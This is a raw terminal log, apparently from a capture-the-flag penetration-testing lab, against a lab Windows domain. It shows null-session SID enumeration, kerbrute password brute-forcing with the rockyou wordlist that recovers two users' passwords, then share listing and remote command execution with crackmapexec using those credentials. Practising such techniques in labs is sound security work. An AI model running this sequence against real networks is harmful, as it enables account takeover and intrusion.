S-1-5-21-518050695-217262318-2335301019-520 TEST\Group Policy Creator Owners (Domain Group)
S-1-5-21-518050695-217262318-2335301019-521 TEST\Read-Only Domain Controllers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-522 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-523 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-524 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-525 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-526 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-527 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-528 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-529 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-530 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-531 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-532 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-533 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-534 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-535 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-536 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-537 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-538 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-539 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-540 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-541 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-542 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-543 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-544 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-545 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-546 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-547 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-548 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-549 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-550 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1000 TEST\AD1$ (Local User)
S-1-5-21-518050695-217262318-2335301019-1001 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1002 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1003 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1004 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1005 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1006 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1007 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1008 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1009 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1010 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1011 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1012 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1013 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1014 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1015 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1016 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1017 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1018 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1019 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1020 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1021 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1022 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1023 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1024 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1025 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1026 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1027 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1028 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1029 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1030 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1031 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1032 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1033 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1034 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1035 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1036 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1037 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1038 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1039 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1040 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1041 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1042 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1043 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1044 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1045 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1046 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1047 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1048 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1049 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 *unknown*\*unknown* (8)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
============================================
| Getting printer info for 172.16.0.20 |
============================================
No printers returned.
enum4linux complete on Thu Feb 13 16:35:40 2020
root@kali ~/ctf/pentestitlab14
root@kali /opt/kerbrute/dist master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt sidorov -t 200 1 ↵ ⚡ 3612 18:40:36
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop
2020/02/13 18:40:52 > Using KDC(s):
2020/02/13 18:40:52 >
172.16.0.20:88
2020/02/13 18:41:23 > [+] VALID LOGIN:
sidorov@test.lab:1234qwer
2020/02/13 18:41:26 > Done! Tested 3277 logins (1 successes) in 34.014 seconds
root@kali /opt/kerbrute/dist master v1.0.3
root@kali ~/ctf/pentestitlab14/vpn2 smbclient -L 172.16.0.20 -U 'sidorov@test.lab' -p 1234qwer
Enter sidorov@test.lab's password:
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
root@kali ~/ctf/pentestitlab14/vpn2
root@kali ~/ctf/pentestitlab14 crackmapexec smb 172.16.0.20 -u 'sidorov@test.lab' -p 1234qwer -x whoami
SMB 172.16.0.20 445 DC2 [*] Windows 6.1 (name:DC2) (domain:TEST) (signing:True) (SMBv1:True)
SMB 172.16.0.20 445 DC2 [+] TEST\sidorov@test.lab:1234qwer
root@kali ~/ctf/pentestitlab14
root@kali /opt/kerbrute/dist master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt petrov -t 200 ✔ ⚡ 3676 19:10:47
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop
2020/02/13 19:10:56 > Using KDC(s):
2020/02/13 19:10:56 >
172.16.0.20:88
2020/02/13 19:12:16 > [+] VALID LOGIN:
petrov@test.lab:P@ssw0rd
2020/02/13 19:12:20 > Done! Tested 8182 logins (1 successes) in 83.873 seconds
root@kali /opt/kerbrute/dist master v1.0.3
root@kali ~/ctf/pentestitlab14 smbclient -L 172.16.0.20 -U 'petrov@test.lab' ✔ ⚡ 3747 19:18:44
Enter petrov@test.lab's password:
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
root@kali ~/ctf/pentestitlab14 cme smb 172.16.0.20 -u 'petrov@test.lab' -p 'P@ssw0rd' -x whoami ✔ ⚡ 3748 19:20:36
CME 172.16.0.20:445 DC2 [*] Windows 6.1 Build 0 (name:DC2) (domain:TEST)
CME 172.16.0.20:445 DC2 [+] TEST\petrov@test.lab:P@ssw0rd
[*] KTHXBYE!
root@kali ~/ctf/pentestitlab14